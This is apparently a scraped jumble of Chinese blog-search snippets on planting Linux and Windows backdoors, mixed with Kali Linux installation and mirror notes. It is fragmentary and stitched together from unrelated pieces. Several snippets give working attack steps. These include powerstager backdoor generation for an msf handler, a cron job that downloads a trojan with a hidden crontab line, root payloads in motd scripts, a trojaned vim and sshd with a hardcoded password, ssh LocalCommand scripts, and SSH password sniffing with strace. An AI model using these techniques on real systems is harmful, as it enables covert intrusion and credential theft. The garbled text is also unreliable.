python3 powerstager.py -m -t win64 --lhost=10.0.2.15 --lport=9055 -o /root/test.exe 会在root目录下生成一个test.exe后门程序...lhost填写kali上线IPlport上线端口 image.png 利用msfconsole监听木马 use exploit/multi/handler set payload windows
环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...—— mypackage 在 mypackage 中创建固定名称的文件夹 start 在 start 文件夹中创建任意名称文件夹,以 pack1 为例 在 pack1 文件夹中创建固定名称文件夹 plugin...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。..."test94" ,这里我们还没有设置别名,因为 /usr/bin/ 比 /bin/ 目录的优先级高,所以被替换了,这不好,我们将自定义的ls换一个目录 /usr/local/games 执行ls 创建...后门 ?
_create_unverified_context());exec(r.read());" 创建 ~/.ssh/config 如果.ssh目录不存在就创建这个目录,可以直接将 /etc/ssh/ssh_config...LocalCommand参数可用 ProxyCommand 连接主机过程中设置代理所使用的命令 重复过程不再赘述,仅写标题 msf设置监听 创建 ~/.ssh/config 如果.ssh目录不存在就创建这个目录...,可以直接将 /etc/ssh/ssh_config 复制过来 创建恶意脚本文件 /tmp/evil.sh ?
kali linux的使用教程 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++...安装文件: 链接:https://pan.baidu.com/s/11ZBV1RJZjW9Gi53YZ7Q31Q 提取码:lqh1 安装教程网上自行百度,这里不再详说 (2)安装kali-linux...kali-linux的iso文件: 链接:https://pan.baidu.com/s/1keH6-us_H9uMuApgmf0ZeA 提取码:lqh2 **也可进入kali官网下载镜像文件 kali...,在Downloads中选择Download Kali Linux, **安装完成之后打开kali linux (3)准备网卡 购买网卡时应该注意: 1、该网卡可以连接kali linux 2、该网卡具有监听模式...CMCC-DDtP airodump-ng --bssid 10:58:87:2D:75:09 -c 3 -w /home/wifi2/test2 wlan0mon 注意:在输入 “抓包路径” 时,需要自己自定义创建一个目录
一会儿再说吧(Linux上万物皆文件,肯定是文件啦!).../etc/cron.deny 这个配置文件是用来禁止一些用户使用cron服务的 我们创建这个文件,并尝试一下将当前用户 helper 加入到禁止列表中 ?...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...victim 主机创建可执行文件,并且设置计划任务 ? ? mac 上成功获取shell ?...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
Kali Linux 教程 之 Kali Linux 更新源 最近官方的更新源,总是访问不到,这可能导致需要kali头文件的功能(比如virtualBox的增强功能,或者输入法安装)失败。...#官方源 deb http://http.kali.org/kali kali main non-free contrib deb-src http://http.kali.org/kali kali.../kali kali main non-free contrib deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib...non-free #新加坡kali源 deb http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib deb-src http:...//mirror.nus.edu.sg/kali/kali/ kali main non-free contrib deb http://security.kali.org/kali-security
信息安全爱好者经常使用的Kali-Linux需要经常更新,扩充弹药,最近在关注Kali-Linux的时候发现一个比较有意思的文档。...而现在我们有Kali Linux metapackage 直白的理解Kali Linux metapackages就是kali的专项工具包,目前kali提供的metapackages如下: ?...我们可以执行以下命令获得metapackages列表 apt-get update && apt-cache search kali-linux 执行以下命令获得该kali-linux-web所包含的的工具列表...apt-get update apt-cache show kali-linux-web |grep Depends 执行以下命令安装kali-linux-web所包含的的工具 apt-get install...kali-linux-web 如下图为需要安装的软件列表 ?
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...,文件创建时间,在 Centos Stream 中叫做 created time,在 Ubuntu中叫 Birth time 0x01 ctime 简介 文件状态变化,ctime 就会变化,例如以下信息变化...文件创建时间 Ubuntu Server 22.10 以及 Centos Stream 9 都有文件创建时间这个概念了 文件创建时间目前 touch 命令也不支持直接修改,也没有找到其他工具可以改...release-update 用系统时间覆盖硬件时间 sudo hwclock --systohc 修改系统时间 sudo date -s "20221102 06:36:59" copy 一份后门文件来满足文件创建时间模仿
,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...修改 00-header ,添加我们的 payload 开启监听,并退出当前登录,重新登录 成功上线,并且获取到 root 权限 新建恶意脚本 这样我们就新建了一个恶意脚本,将恶意脚本的创建时间设置为和其他脚本一致...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...答案是并不会,此时我怀疑是不是对目录权限有要求,所以我复制了 /etc/update-motd.d 这个目录的权限,之后创建了新的脚本 结果还是不会执行 source 和 .
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
1、安装后门 这次需要用到powershell攻击框架Empire,使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本...看到以上界面就代表后门安装完成 当我们运行navicat快捷方式的同时 可以看到powershell.exe已经悄悄的链接empire ?...点击快捷方式后先执行快捷方式原来链接的目标,然后在注册表读取HKCU:\Software\Microsoft\Windows\debug的值运行(后门安装时把执行的代码加密后放到了HKCU:\Software...3、后门的清除 执行 以下命令清除后门 ?
第二章 定制 Kali Linux 作者:Willie L....从Applications Menu | Kali Linux | Forensics | Digital Anti Forensics | truecrypt运行TrueCrypt,你会看到下面的窗口...: 点击Create Volume(新建卷)来启动TrueCrypt Volume Creation Wizard(TrueCrypt卷创建向导)。...格式化会开始,完成时TrueCrypt的卷就创建好了。按下OK或Exit(退出)。 我们现在回到TrupCrypt窗口。...工作原理 这个秘籍中,我们配置了 Truecrypt,创建了保护卷,之后挂载了它。这是个用于保护数据安全性的实用工具。
telnet port (23) is used. telnet 反弹shell的方式和 nc 是一样的,在这里不过多描述了 ---- 在这里再添加一点之前遗漏的小东西 0x03 mknod [+] 之前创建命名管道都是用...mkfifo ,今天我发现了一个命令 mknod ,这个命令是用来创建一个文件块,可以用来创建设备,包括以下设备: 块设备(b) 字符设备 (c) 没有缓冲的字符设备 (u) fifo设备(p) 之前我们创建一个命名管道是
◎ 使用 Fcitx 在 Kali Linux 上优雅地输入中文 安装 1 2 root@kali:~# apt-get update root@kali:~# apt-get install fcitx...个人觉得就 dark 还看得过去,特别是 Kali 默认的暗色主题,用 dark 很合适。当然,如果你把 GNOME 主题换成了雪白雪白的,那么 dark 估计就不行了,咋整呢?
1,准备工作 kali-linux-2020.2-installer-amd64 链接:https://pan.baidu.com/s/1JIVRTQm0Qdmubk-bFj6Iow kali_v2019.2....zip 链接:https://pan.baidu.com/s/19Lvcv8UUNCrjFipxNiISDA kali-linux-1.0.6-amd64 链接:https://pan.baidu.com.../s/1Dc0X-lpvZWr-JWgvc9wi1g kali-linux-2020.2a-vmware-amd64 链接:https://pan.baidu.com/s/157_r7rDPeJVQqyHisjh...-6A 2,现在开始安装kali linux,首先创建一个新的虚拟机 其他的都默认就可以了,这一步我们选择稍后安装操作系统 这里的选择别太低就可以,影响不是太大 给你的第一个渗透系统取一个你喜欢的名字把...还是相当帅气的,符合我的风格 开机后面,输入安装时创建的用户和密码,就可以进入桌面 总结:界面变化很大,个人感觉比之前流畅了很多,虚拟机安装kali可能硬件性能不大好,但这次感觉流畅了很多
领取专属 10元无门槛券
手把手带您无忧上云